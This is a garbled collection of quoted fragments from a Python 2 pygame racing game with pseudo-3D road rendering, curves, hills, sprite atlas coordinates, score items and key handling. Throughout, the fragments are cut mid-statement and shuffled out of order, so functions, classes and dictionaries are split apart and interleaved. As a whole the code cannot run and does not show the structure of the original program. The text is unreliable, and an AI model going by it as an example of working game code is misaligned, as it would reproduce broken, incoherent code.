5, 'y': 555, 'w': 135, 'h': 332", "= 100 self.disp_add(self.sn1) ''' ''' self.lb1 = pygm.SptLbl('hello,', c=consts.GREEN, font_size=32)", "\"\"\" import math import random import time from starfish import", "= math.pi /180.0 * 0.5 theta_i = math.pi /180.0 *", "'y': 5, 'w': 282, 'h': 295 }, 'BILLBOARD04': { 'x':", "ys4 = ys3 self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4,", "FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],", "not used now !! ##x_i = 2 y_sprt = ys1", "elif k == self.pglc.K_RETURN: self.road_reset() elif k == self.pglc.K_TAB: self.road_reset_keep_segs()", "else: return None def check_key(self, events): #print id(events) r_events =", "150, 'h': 260 }, 'BOULDER1': { 'x': 1205, 'y': 760,", "0], h=30, *args, **kwargs): super(FPSptFog, self).__init__(size) self.c = c self.h", "p_dt) if hill.rect.left + hill.rect.width < 0: hill.rect.left += hill.rect.width", "else: self.tm_end = time.time() self.tm_last_once = self.tm_end - self.tm_start else:", "tht_d rad_m = 10.0#50.0# x += rad_m * math.cos(tht) y", "xs1, ys1, xsl1, ys1, xsl3, ys3, xs3, ys3, seg['color']['rumble']) self.render_polygon(None,", "[1, 0, self.size[0] - 2, y]) # from down to", "'w': 300, 'h': 170 }, 'BILLBOARD06': { 'x': 488, 'y':", "ys2, self.w, ys4, 0, ys3, seg['color']['grass']) self.render_polygon(None, xs1, ys1, xs2,", "sprt_w = obj.rect.width car_x = self.player_x car_w = self.car.rect.width *", "render order self.track_len = 0.0 self.seg_len = 200.0#100.0#20.0#60.0#200.0# self.road_w =", "self.cv_to_engl(cv_l, rad) #tht += tht_d tht -= tht_d rad_m =", "w_half): self.score += scr def check_tm(self): if self.position > self.seg_len", "def __init__(self, size, c=[0, 81, 8, 0], h=30, *args, **kwargs):", "events: #print event if event.type == self.pglc.KEYUP: k = event.key", "ys4, xs3, ys3, seg['color']['road']) def rd_seg_render__3_o(self): \"\"\"curve test 2: draw", "'_' + sprt obj = info.get('obj') ''' # TODO: <1>", "0.0) yw2 = seg['p2']['world'].get('y', 0.0) yc1 = yc - yw1", "[rd_w_half + self.lane_w, # rd_w_half - self.lane_w] sprt_x = obj.rect.left", "IMG_POS_SPRITES = { 'PALM_TREE': { 'x': 5, 'y': 5, 'w':", "pos) class FPSptFog(sptdraw.SptDrawBase): def __init__(self, size, c=[0, 81, 8, 0],", "{'z': (n + 1) * self.seg_len, 'y': self.seg_lasy_y()}, 'camera': {},", "'''' self.sn1 = SptTmpx((200, 200)) self.sn1.rect.top = 100 self.sn1.rect.left =", "= self.lane_w - self.player_x xcr4 = -self.lane_w - self.player_x yc", "+= rad_m * math.cos(tht) y += rad_m * math.sin(tht) pnts.append([x,", "10,}, 'heart': {'imgs': ['img_sprts/i_heart.png'], 'score': 50,}, 'pot1': {'imgs': ['img_sprts/i_pot1.png'], 'score':", "FP_COLOR_BLACK} seg = { 'index': n, 'p1': {'world': {'z': (n", "= xc4 + self.lane_w xcr1 = xcr1 - x_curve xcr2", "xpr1 = self.xc_to_xp(xcr1, self.d, zc1) xsr1 = self.xp_to_xs(xpr1, self.w) xpr2", "pnts return pnts def get_segs_pnts_1(self, segs, rad): pnts = []", "##del self.rd_sprt_objs[obj_k] img = FP_ROAD_SPRTS[sprt]['imgs'][0] obj = FPSptRdSprts.create_by_img(img) # avoid:", "= FPSptRdSprts.create_by_img(img) # avoid: pygame.error: Width or height is too", "= (i+1)*self.seg_len #zw2 = (i+2)*self.seg_len #''' # <1> zw1 =", "self.xp_to_xs(xpr3, self.w) xpr4 = self.xc_to_xp(xcr4, self.d, zc2) xsr4 = self.xp_to_xs(xpr4,", "0.8: # curve = 0.0 # yw = random.random() *", "rad_m * math.sin(tht) pnts.append([x, y]) #print pnts return pnts def", "r_events.append(event) else: r_events.append(event) self.e_keys_up = e_keys_up self.e_keys_dn = e_keys_dn return", "int(self.hill_speed * p_dt) if hill.rect.left + hill.rect.width < 0: hill.rect.left", "__init__(self, size, c=[0, 81, 8, 0], h=30, *args, **kwargs): super(FPSptFog,", "img_file, pos, *args, **kwargs): super(FPSptSprts, self).__init__(img_file, pos) class FPSptFog(sptdraw.SptDrawBase): def", "v, accel, dt): return v + (accel * dt) def", "obj.rect.width car_x = self.player_x car_w = self.car.rect.width * 2 sprt_at", "def check_key(self, events): #print id(events) r_events = [] e_keys_up =", "self.pglc.K_k: return 1 elif k == self.pglc.K_SPACE or k ==", "if self.position > self.seg_len * 2: if self.tm_start == 0.0:", "self.tm_start = 0.0 self.tm_end = 0.0 self.tm_last_once = 0.0 self.sky_speed", "'coin5': {'imgs': ['img_sprts/i_coin5.png'], 'score': 5,}, 'coin20': {'imgs': ['img_sprts/i_coin20.png'], 'score': 20,},", "'x': 488, 'y': 555, 'w': 298, 'h': 190 }, 'BILLBOARD05':", "+ seg.get('curve', 0.0) # for hills yw1 = seg['p1']['world'].get('y', 0.0)", "self.seg_len) zc2 = zw2 - self.camera_z - (self.position % self.seg_len)", "scale pass else: try: obj.scale(scale) except: #print 'scale <2>', scale", "float(n)/enter), self.util_ease_out(start_y, end_y, float(n)/total)) for n in range(hold): self.rd_seg_add(curve, self.util_ease_out(start_y,", "- self.tm_start else: self.tm_start = 0.0 #self.tm_end = 0.0 def", "yp = yc * (d / zc) return yp def", "0 self.bg_hills2.rect.left = self.bg_hills1.rect.width self.disp_add(self.bg_hills2) self.bg_trees1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees1.rect.top", "100 self.sn1.rect.left = 100 self.disp_add(self.sn1) ''' ''' self.lb1 = pygm.SptLbl('hello,',", "- self.player_x xc4 = -self.road_w / 2 - self.player_x yc", "'x': 313, 'y': 897, 'w': 298, 'h': 190 }, 'BOULDER2':", "def rd_seg_add(self, curve=0.0, yw=0.0): #print '+', curve, yw n =", "2): if (car_x - w_half) < sprt_at < (car_x +", "330, 'w': 195, 'h': 140 }, 'SEMI': { 'x': 1365,", "road_segs_to_file(self, segs_file=None): if not segs_file: segs_file = 'sr_roads/sr_road_' + str(int(time.time()))", "self.geo_prjc_scale(self.d, zc1) x_rnd = random.randint(1, self.road_w / 2 - 10)", "once for a segment seg_i = self.player_seg['index'] if seg_i >", "else: r_events.append(event) return r_events def refresh(self, fps_clock, *args, **kwargs): self.rdpsd.lbl_set(str(int(self.road.speed)))", "FP_ROAD = { 'LENGTH': {'NONE': 0, 'SHORT': 25, 'MEDIUM': 50,", "self.size[0], d] #ca = 255 / n * (n -", "self.bk = pygm.SptImg(bk_im) self.bk.rect.top = -230 self.bk.rect.left = -230 #self.disp_add(self.bk)", "return events def refresh(self, fps_clock, *args, **kwargs): pass class GMFlatpath(pygm.PyGMGame):", "= 1.0 #tht_d = math.acos(a) tht_d = math.asin(a) # TODO:", "cv_s: tht_d = self.cv_to_engl(cv_l, rad) #tht += tht_d tht -=", "FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], 0.0) def add_low_rolling_hills(self, num,", "for n in range(a): self.rd_seg_add(0.0, 0.0) def rd_seg_add(self, curve=0.0, yw=0.0):", "start_y = self.seg_lasy_y() end_y = start_y + (int(yw) * self.seg_len)", "215, 'h': 220 }, 'STUMP': { 'x': 995, 'y': 330,", "% total) / total def add_road(self, enter, hold, leave, curve,", "zw2 - self.camera_z - self.position curve_d = 500 #x#xc1 =", "282 }, 'BOULDER3': { 'x': 230, 'y': 280, 'w': 320,", "if not keep_segs: self.segments = [] self.rd_sprt_objs = {} self.rd_sprt_cache", "0.0 self.tm_start = 0.0 self.tm_end = 0.0 self.tm_last_once = 0.0", "FP_COLOR_BLUE = '#00EEEE' FP_COLORS = { 'SKY': '#72D7EE', 'TREE': '#005108',", "(int(xsr1), 116 - int(ys1)), # 3, 0) # render road", "# if on the grass, slow down if self.player_x <", "make sure we check score once for a segment seg_i", "[x2, y2+a], [x3, y3+a], [x4, y4+a], [x1, y1+a]] # reflect", "d-y1], [x2, d-y2], [x3, d-y3], [x4, d-y4], [x1, d-y1]] c", "2), self.size[0] / 2, 0) class SptTmpi(pygm.SptImg): def __init__(self, img_file,", "def add_curves(self): self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['MEDIUM'])", "'w': 88, 'h': 55 }, 'CAR02': { 'x': 1383, 'y':", "tht = 0.0 rad_m = 4.0#2.0#1.0# cv_s = 0 cv_l", "* (d / zc) return yp def xp_to_xs(self, xp, w):", "['sprites']: seg_c[k] = v else: seg_c[k] = [] for spr", "self.position for i, seg in enumerate(self.segments): zw1 = seg['p1']['world']['z'] zw2", "for seg in segs: curve = seg.get('curve', 0.0) if curve", "pass x_i_saved = info.get('x_i') #if not x_i_saved: # info['x_i'] =", "* (i + 1)) xc1 = (rad - xx1) -", "sprites with right order for obj in self.rd_sprt_cache[::-1]: self.disp_add(obj) def", "self.player_seg['p1']['world']['z'] #print 'world y', self.player_seg['p1']['world'].get('y', 0.0) # clear the sprites", "def check_tm(self): if self.position > self.seg_len * 2: if self.tm_start", "not x_i_saved: # info['x_i'] = x_i # x_i_saved = x_i", "curve_d * i xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 =", "self.road.speed / self.road.speed_max self.spd.progress(spdc) class FPSceneA(pygm.PyGMScene): def __init__(self, *args, **kwargs):", "fps_clock, *args, **kwargs): self.check_player_di(self.e_keys_dn, self.e_keys_up) self.draw_on() self.rd_seg_render() self.update_world() self.check_if_car_out_road() self.check_score()", "= 0 #print 'b_curve', b_curve #print 'world z', self.player_seg['p1']['world']['z'] #print", "for hill in self.bg_hills: hill.rect.left += int(self.hill_speed * p_dt) if", "{'imgs': ['img_sprts/ashra_defeat1.png'], 'score': -100,}, #'bear': {'imgs': ['img_sprts/bear2.png'], 'score': -80,}, #'dinof':", "'y': 961, 'w': 80, 'h': 45 }, 'PLAYER_UPHILL_STRAIGHT': { 'x':", "self.yp = 0.0 self.xs = 0.0 self.ys = 0.0 self.d", "= random.randint(1, self.road_w / 2 - 10) * seg_scale #x_sprt", "f): sc = self.rd_seg_get_cleared(self.segments) s = utils.json_dumps(sc) with open(f, 'w')", "['img_sprts/rock_d2.png'], 'score': -10,}, 'rockr': {'imgs': ['img_sprts/rock_r2.png'], 'score': -50,}, #'ashra_defeat': {'imgs':", "#if not init and not keep_segs: if not init: self.rd_sprts_del_all_objs()", "* i theta2 = theta_i * (i + 1) dx1", "**kwargs): super(FPSptRdSprts, self).__init__(img_file) @classmethod def create_by_img(cls, img): return cls(img) #", "import utils IMG_POS_BACKGROUND = { 'HILLS': { 'x': 5, 'y':", "* d, self.size[0], d] #ca = 255 / n *", "def __init__(self, img_file, pos, *args, **kwargs): super(FPSptSprts, self).__init__(img_file, pos) class", "d, zc): if zc == 0.0: #xp = float('inf') #xp", "k == self.pglc.K_j: return 0 elif k == self.pglc.K_k: return", "[self.size[0] / 2 + x, self.size[1] / 2 - y]", "* math.cos(tht) y += rad_m * math.sin(tht) pnts.append([x, y]) #print", "(xsr1 + xsl1) / 2.0 #x_sprt = random.choice(x_pos) x_i =", "{ 'x': 1205, 'y': 1018, 'w': 80, 'h': 56 },", "in self.bg_sky: #print sky sky.rect.left += int(self.sky_speed * p_dt) #", "1295, 'y': 1018, 'w': 80, 'h': 45 }, 'PLAYER_UPHILL_RIGHT': {", "= h / 2.0 - h / 2.0 * yp", "'lane': '#CCCCCC'}, } FP_ROAD = { 'LENGTH': {'NONE': 0, 'SHORT':", "zw2 = seg['p2']['world']['z'] zc1 = zw1 - self.camera_z - self.position", "'curve': curve, 'color': c, 'sprites': [], 'looped': 0, } self.segments.append(seg)", "self.bg_hills2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills2.rect.top = 0 self.bg_hills2.rect.left = self.bg_hills1.rect.width", "self.road.rd_reset() self.rdmap_reset() def road_reset_keep_segs(self): self.road.rd_reset(init=False, keep_segs=True) def road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'): segs_file", "len(self.segments) * self.seg_len except Exception as e: print e self.init_rd_segs_rand_1()", "= self.segments[segbi] b_curve = self.player_seg.get('curve', 0.0) #b_percent = 0.5 b_percent", "# [1, 0, self.size[0] - 2, y]) # from down", "/ 2: if i < self.seg_draw_n / 4: theta1 =", "2 - self.player_x xc3 = self.road_w / 2 - self.player_x", "= 2 n = self.h / d for i in", "xsl2] #x_sprt = xsr1 x_sprt = (xsr1 + xsl1) /", "-10,}, 'rockr': {'imgs': ['img_sprts/rock_r2.png'], 'score': -50,}, #'ashra_defeat': {'imgs': ['img_sprts/ashra_defeat1.png'], 'score':", "{}, 'screen': {}}, 'p2': {'world': {'z': (n + 2) *", "b_percent) x_curve = 0 #print 'b_curve', b_curve #print 'world z',", "refresh' #''' if self.player_di == 3: # < self.player_x -=", "i in range(n): rl = random.choice([1, -1]) enter = random.randint(10,", "self.player_di == 1: self.player_x += 19 if self.player_x > 1000:", "xs2, ys2, xs4, ys4, xs3, ys3, seg['color']['road']) def rd_seg_render__4_o(self): \"\"\"curve\"\"\"", "int(ys1)), # 3, 0) # render road sprites # TODO:", "def get_segs_pnts_1(self, segs, rad): pnts = [] x, y =", "e: print e self.init_rd_segs_rand_1() else: if not keep_segs: self.init_rd_segs_rand_1() self.draw_on()", "n in range(hold): self.rd_seg_add(curve, self.util_ease_out(start_y, end_y, (float(n)+enter)/total)) for n in", "'y': 490, 'w': 150, 'h': 260 }, 'BOULDER1': { 'x':", "self.score < 0: # self.score = 0 self.game_over = True", "50,}, 'pot1': {'imgs': ['img_sprts/i_pot1.png'], 'score': -5,}, 'pot2': {'imgs': ['img_sprts/i_pot2.png'], 'score':", "self.camera_z - self.position zc2 = zw2 - self.camera_z - self.position", "== self.pglc.KEYUP: k = event.key if k == self.pglc.K_SPACE: #", "'segbi', segbi self.player_seg = self.segments[segbi] b_curve = self.player_seg.get('curve', 0.0) #b_percent", "objs will be deleted at rd_sprts_del_all_objs() ##del self.rd_sprt_objs[obj_k] img =", "'score': -80,}, #'dinof': {'imgs': ['img_sprts/dinof2.png'], 'score': -50,}, 'blobb': {'imgs': ['img_sprts/blobb1.png'],", "increment while (result >= mx): result -= mx while (result", "= self.size[1] * prog self.fill(self.c_bg) #self.pygm.draw.rect(self.surf, consts.GREEN, # [1, 0,", "#print pnts return pnts def draw_segs(self, segs, rad): pnts =", "929, 'y': 897, 'w': 235, 'h': 118 }, 'BUSH2': {", "self.rd_seg_get_cleared(self.segments) s = utils.json_dumps(sc) with open(f, 'w') as fo: fo.write(s)", "seg.get('curve', 0.0) print 'world z', seg['p1']['world']['z'] print 'world y', seg['p1']['world'].get('y',", "len(pnts) <= 1: return #if len(pnts) > 0: # pnts.append(pnts[0])", "* math.cos(engi * (i + 1)) xx4 = rad2 *", "#xc2 = -self.road_w / 2 - self.player_x - curve_d *", "i) xx3 = rad1 * math.cos(engi * (i + 1))", "#self.tm_end = 0.0 def update_bg(self): # always move the cloud", "sky.rect.width > 0: sky.rect.left -= sky.rect.width * 2 if self.speed", "self.w) self.render_polygon(None, xs1, ys1, xsl1, ys1, xsl3, ys3, xs3, ys3,", "- dx_curve xcl1 = xc1 - self.lane_w xcl2 = xc2", "= dx_curve + seg.get('curve', 0.0) # for hills yw1 =", "self.d, zc1) ys1 = self.yp_to_ys(yp1, self.h) ys2 = ys1 yp3", "self.key_to_di_b(event.key) if di is not None: e_keys_dn.append(di) else: r_events.append(event) else:", "1.0#2.0#3.0 self.speed_dt_dn = 2.0#4.0#6.0 self.speed_dt_na = 1.0#3.0 self.player_x_dt = 60.0#30.0#20.0", "print 'curve', seg.get('curve', 0.0) print 'world z', seg['p1']['world']['z'] print 'world", "self.road_w / 2 rad2 = rad - self.road_w / 2", "xc4 = -self.road_w / 2 - self.player_x #xcl1 = xc1", "2: if self.tm_start == 0.0: self.tm_start = time.time() self.tm_end =", "260 }, 'BOULDER1': { 'x': 1205, 'y': 760, 'w': 168,", "if seg['index'] < segbi: zw1 = (i+1)*self.seg_len zw2 = (i+2)*self.seg_len", "k == self.pglc.K_TAB: self.road_reset_keep_segs() elif k == self.pglc.K_BACKSPACE: self.road_reset_from_file() elif", "self.fill(consts.GREEN) self.pygm.draw.circle(self.surf, consts.WHITE, (self.size[0] / 2, self.size[1] / 2), self.size[0]", "195, 'h': 140 }, 'SEMI': { 'x': 1365, 'y': 490,", "'BILLBOARD04': { 'x': 1205, 'y': 310, 'w': 268, 'h': 170", "= ys3 self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4, 0,", "trees.rect.left += int(self.tree_speed * p_dt) if trees.rect.left + trees.rect.width <", "ys = h / 2.0 - yp return ys def", "self.lane_w xcr1 = xcr1 - x_curve xcr2 = xcr2 -", "- self.seg_draw_n) * self.seg_len def seg_lasy_y(self): seg_n = len(self.segments) if", "40) leave = random.randint(10, 40) curve = rl * random.random()", "curve_d * i #xc2 = -self.road_w / 2 - self.player_x", "if self.player_go != 1: self.player_go = 0 if 1 in", "== self.pglc.K_n: return 2 elif k == self.pglc.K_d: return 3", "= random.randint(10, 40) curve = rl * random.random() * 8.0", "x += rad_m * math.cos(tht) y += rad_m * math.sin(tht)", "seg.get('curve', 0.0) if curve == 0.0: if cv_s: tht_d =", "self).__init__(*args, **kwargs) self.straight = FPStraight({}) self.straight.rect.top = 0 self.straight.rect.left =", "0.0: rad_m = 1.0#0.1# else: a = float(curve) / rad", "360, 'h': 360 }, 'DEAD_TREE1': { 'x': 5, 'y': 555,", "'x': 255, 'y': 1097, 'w': 232, 'h': 152 }, 'BILLBOARD03':", "self.tm_end = 0.0 self.tm_last_once = 0.0 self.sky_speed = 0.1#0.05# self.hill_speed", "self.w) xpr2 = self.xc_to_xp(xcr2, self.d, zc1) xsr2 = self.xp_to_xs(xpr2, self.w)", "{'imgs': ['img_sprts/i_heart.png'], 'score': 50,}, 'pot1': {'imgs': ['img_sprts/i_pot1.png'], 'score': -5,}, 'pot2':", "or \\ self.player_x > self.road_w / 2: if self.score >", "self.player_x xc4 = -self.road_w / 2 - self.player_x #xcl1 =", "1205, 'y': 490, 'w': 150, 'h': 260 }, 'BOULDER1': {", "0.0 def update_bg(self): # always move the cloud for sky", "self.disp_add(self.prog) self.spd = FPSptProgress((4, 100), c_prog=consts.GREEN) self.spd.rect.top = 70#340 self.spd.rect.left", "#self.fill(self.c) d = 2 n = self.h / d for", "zc2) xsr4 = self.xp_to_xs(xpr4, self.w) self.render_polygon(None, xsr1, ys1, xsr2, ys2,", "the segment just under the car #sprts = self.player_seg['sprites'] sprts", "w / 2.0 + xp return xs def yp_to_ys(self, yp,", "self.tm_start else: self.tm_end = time.time() self.tm_last_once = self.tm_end - self.tm_start", "== 0.0: #yp = float('inf') #yp = 2 ** 64", "xcr2 = xcr2 - x_curve xcr3 = xcr3 - x_curve", "}, 'BILLBOARD08': { 'x': 230, 'y': 5, 'w': 385, 'h':", "64 xp = xc else: xp = xc * (d", "- self.player_x - curve_d * i xp1 = self.xc_to_xp(xc1, self.d,", "si = (segbi + i) % seg_n #print si seg", "xc1 = xc1 - x_curve xc2 = xc2 - x_curve", "sv in spr.items(): if sk not in ['obj']: spr_n[sk] =", "road sprites * sound \"\"\" import math import random import", "print xs4, ys4, xs3, ys3 print '-' * 30 '''", "i in range(n): rct = [0, i * d, self.size[0],", "curve_d * i #xc3 = self.road_w / 2 - self.player_x", "is None: pos = self.position i = int(pos / self.seg_len)", "self.scr.lbl_set(str(int(self.road.score))) self.tm_once.lbl_set(str(int(self.road.tm_last_once))) prg = self.road.position / self.road.track_len self.prog.progress(prg) spdc =", "math.pow(1 - percent, 2)) def util_ease_in_out(self, a, b, percent): return", "None or 0 return #rd_w_half = self.road_w / 2 #x_pos", "test #self.pygm.draw.circle(self.surf, consts.BLUE, # (int(xsr1), 116 - int(ys1)), # 3,", "2 - self.player_x - curve_d * i #xc4 = -self.road_w", "pygm.SptLbl(str(int(self.road.speed)), c=consts.GREEN, font_size=12) self.rdpsd.rect.top = 456 self.rdpsd.rect.left = 312 self.disp_add(self.rdpsd)", "for i in range(n): self.segments[i]['color'] = FP_COLORS['START_Y'] def rd_sprts_init_rand(self, n=None):", "segs_c = [] for seg in segs: if not seg['sprites']:", "1365, 'y': 644, 'w': 100, 'h': 78 }, 'CAR03': {", "y): return [self.size[0] / 2 + x, self.size[1] / 2", "- trees.rect.width > 0: trees.rect.left -= trees.rect.width * 2 class", "open(f, 'r') as fi: s = fi.read() segs = utils.json_loads(s)", "yw=0.0): #print enter, hold, leave, curve, yw start_y = self.seg_lasy_y()", "y2], [x3, y3], [x4, y4], [x1, y1]] #pnts = [[x1,", "0 self.disp_add(self.road) self.disp_add(self.car) self.rdmap = FPSptRoadMap((480, 480), self.road.rd_get_segs(whole=True), self.road.seg_len) self.rdmap.rect.top", "self.rd_seg_json_load(segs_file) self.segments = segs self.track_len = len(self.segments) * self.seg_len except", "init=False, keep_segs=False, segs_file=None): #if not init and not keep_segs: if", "self.rd_seg_add(curve, self.util_ease_out(start_y, end_y, (float(n)+enter)/total)) for n in range(leave): self.rd_seg_add(self.util_ease_out(curve, 0,", "self.lane_w xcl3 = xc3 - self.lane_w xcl4 = xc4 +", "[[x1, d-y1], [x2, d-y2], [x3, d-y3], [x4, d-y4], [x1, d-y1]]", "xc else: xp = xc * (d / zc) return", "= random.random() #print p rl = random.choice([1, -1]) if p", "total def add_road(self, enter, hold, leave, curve, yw=0.0): #print enter,", "= self.xp_to_xs(xp4, self.w) yp1 = self.yc_to_yp(yc1, self.d, zc1) ys1 =", "4: sprt_at = 1100 elif x_i == 5: sprt_at =", "leave = random.randint(10, 40) if p < 0.3: curve =", "*args, **kwargs): super(FPSptRoadMap, self).__init__(size) self.segs = segs self.rad = rad", "class FPSptFog(sptdraw.SptDrawBase): def __init__(self, size, c=[0, 81, 8, 0], h=30,", "seg_n) % seg_n return i def rd_get_segs(self, whole=False): if whole:", "'car_w', car_w #print 'sprt_at', (car_x - car_w / 2), sprt_at,", "'y': 760, 'w': 168, 'h': 248 }, 'BUSH1': { 'x':", "+= dx2 #+ dx1 #''' self.render_polygon(None, 0, ys1, self.w, ys2,", "+= rad_m * math.sin(tht) pnts.append([x, y]) #print pnts return pnts", "x_curve - dx_curve xcl1 = xc1 - self.lane_w xcl2 =", "if k == self.pglc.K_f or k == self.pglc.K_j: return 0", "3, 0) # render road sprites # TODO: check if", "''' # for curve xc1 = xc1 - x_curve xc2", "self.seg_len) total = enter + hold + leave for n", "= self.player_x car_w = self.car.rect.width * 2 sprt_at = 10000", "78 }, 'CAR03': { 'x': 1383, 'y': 760, 'w': 88,", "= 0.0 # yw = random.random() * 10.0 else: curve", "* i #xc2 = -self.road_w / 2 - self.player_x -", "0.5 b_percent = self.util_curve_percent_remaining(self.position, self.seg_len) dx_curve = - (b_curve *", "zw2 = (i+2)*self.seg_len else: # <1> zw1 = seg['p1']['world']['z'] zw2", "'#009A00', 'rumble': '#BBBBBB' }, 'START': {'road': FP_COLOR_WHITE, 'grass': FP_COLOR_WHITE, 'rumble':", "for hills yw1 = seg['p1']['world'].get('y', 0.0) yw2 = seg['p2']['world'].get('y', 0.0)", "self.d, zc2) ys3 = self.yp_to_ys(yp3, self.h) ys4 = ys3 '''", "self.straight = FPStraight({}) self.straight.rect.top = 0 self.straight.rect.left = 0 self.disp_add(self.straight)", "c_bg self.c_prog = c_prog self.progress(0.0) def progress(self, prog): y =", "image / animate / ... 'obj': None, # need to", "yw n = len(self.segments) #print n if n % 2", "0 self.disp_add(self.bg_hills1) self.bg_hills2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills2.rect.top = 0 self.bg_hills2.rect.left", "-= 1 #self.score -= 1 #if self.score < 0: #", "segs_file=None): #if not init and not keep_segs: if not init:", "self.xc_to_xp(xcl2, self.d, zc1) xsl2 = self.xp_to_xs(xpl2, self.w) xpl3 = self.xc_to_xp(xcl3,", "= (i+2)*self.seg_len #''' # <1> zw1 = seg['p1']['world']['z'] zw2 =", "[x3, y3+a], [x4, y4+a], [x1, y1+a]] # reflect the y-", "p_curve * self.centrifugal #print p_dt #self.player_x -= p_dt self.player_x +=", "5, 'y': 897, 'w': 298, 'h': 190 }, 'BILLBOARD07': {", "self.fill(self.clr_dark_grass) def add_fog(self): self.fog = FPSptFog(self.size) self.fog.rect.top = 240 self.fog.rect.left", "= self.road.speed / self.road.speed_max self.spd.progress(spdc) class FPSceneA(pygm.PyGMScene): def __init__(self, *args,", "super(FPSptRoadMap, self).__init__(size) self.segs = segs self.rad = rad #self.fill(consts.WHITE) self.draw_segs(self.segs,", "= -230 self.bk.rect.left = -230 #self.disp_add(self.bk) self.scn1 = FPSceneA() self.disp_add(self.scn1)", "xc1 - x_curve xc2 = xc2 - x_curve xc3 =", "def road_segs_to_file(self, segs_file=None): if not segs_file: segs_file = 'sr_roads/sr_road_' +", "#self.player_x -= dpx1 # <1> #for i, seg in enumerate(self.segments):", "import pygm from starfish import consts from starfish import sptdraw", "+ 2) * self.seg_len, 'y': yw}, 'camera': {}, 'screen': {}},", "% 2 == 1: xpl1 = self.xc_to_xp(xcl1, self.d, zc1) xsl1", "self.seg_lasy_y() end_y = start_y + (int(yw) * self.seg_len) total =", "rad): pnts = self.get_segs_pnts(segs, rad) #print pnts if len(pnts) <=", "sky.rect.left - sky.rect.width > 0: sky.rect.left -= sky.rect.width * 2", "(rad - xx4) - self.player_x xp1 = self.xc_to_xp(xc1, self.d, zc1)", "= rl * random.random() * 8.0 yw = 0.0 self.add_road(enter,", "self.spd = FPSptProgress((4, 100), c_prog=consts.GREEN) self.spd.rect.top = 70#340 self.spd.rect.left =", "self.rd_seg_init(random.randint(1, 10)) # for a3c train self.rd_seg_init_rand_curve() #self.add_curves() #self.add_low_rolling_hills(20, 2.0)", "= self.yc_to_yp(yc1, self.d, zc1) ys1 = self.yp_to_ys(yp1, self.h) ys2 =", "['img_sprts/chick_fly3.png'], 'score': 70,}, 'clown': {'imgs': ['img_sprts/clown1.png'], 'score': -100,}, } class", "FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['MEDIUM']) elif p < 0.7: self.add_road(FP_ROAD['LENGTH']['MEDIUM'],", "* p_dt) # always move the cloud #sky.rect.left -= self.sky_speed", "need to create at render ##'x_i': None, # get real", "FPStraight(pygm.PyGMSprite): def __init__(self, cfg, *args, **kwargs): super(FPStraight, self).__init__() self.cfg =", "= 0.0 self.yp = 0.0 self.xs = 0.0 self.ys =", "* i) xx2 = rad2 * math.cos(engi * i) xx3", "= (segbi + i) % seg_n #print si seg =", "'h': 190 }, 'BOULDER2': { 'x': 621, 'y': 897, 'w':", "* i # <3> xx1 = rad1 * math.cos(engi *", "'w': 320, 'h': 220 }, 'COLUMN': { 'x': 995, 'y':", "{} self.rd_sprt_cache = [] # for sprites render order self.track_len", "# need to create at render ##'x_i': None, # get", "self.lane_w, # rd_w_half - self.lane_w] sprt_x = obj.rect.left sprt_w =", "self.lane_w = 60 self.seg_n = 300#200 #self.seg_draw_n = 200#150 self.seg_draw_n", "segs # #### geometry #### # def geo_prjc_scale(self, d, zc):", "self.lane_w #xcl3 = xc3 - self.lane_w #xcl4 = xc4 +", "'x': 1383, 'y': 894, 'w': 80, 'h': 57 }, 'CAR01':", "+= dx1 xs2 += dx1 xs3 += dx2 #+ dx1", "cfg, *args, **kwargs): super(FPStraight, self).__init__() self.cfg = cfg self.bg_sky1 =", "2.0) ##self.add_low_rolling_hills(30, 4.0) #self.rd_seg_init_rand(10)#50#10#3#1 #segnrand = random.randint(3, 30) segnrand =", "GMFlatpath('flatpath <:::>', 640, 480) sf = GMFlatpath('flatpath <:::>', 640, 480,", "= None # the segment just under the car self.player_di", "= 500.0#1000.0#0.0 == self.camera_h self.xw = 0.0 self.yw = 0.0", "p_dt def check_if_car_out_road(self): # decrease score when go out the", "SptTmpx((40, 40)) #return o class FPSptRoadB(sptdraw.SptDrawBase): def __init__(self, size, cfg,", "xsr1, ys1, xsr2, ys2, xsr4, ys4, xsr3, ys3, seg['color']['rumble']) def", "= 0.0 self.camera_z = 500.0#1000.0#0.0 == self.camera_h self.xw = 0.0", "* more road sprites * sound \"\"\" import math import", "else: if cv_s: cv_l += curve else: cv_s = 1", "self.road_w / 2: if self.score > 0: self.score -= 1", "2.0 #y_sprt = (ys1 + ys3) / 2.0 x_dt =", "'>>> refresh' #''' if self.player_di == 3: # < self.player_x", "'self.position', self.position for i, seg in enumerate(self.segments): zw1 = seg['p1']['world']['z']", "font_size=32) self.lb1.rect.top = 200 self.lb1.rect.left = 100 self.disp_add(self.lb1) ''' def", "elif k == self.pglc.K_LEFT: return 3 else: return None def", "'score': -100,}, } class SptTmpx(sptdraw.SptDrawBase): def 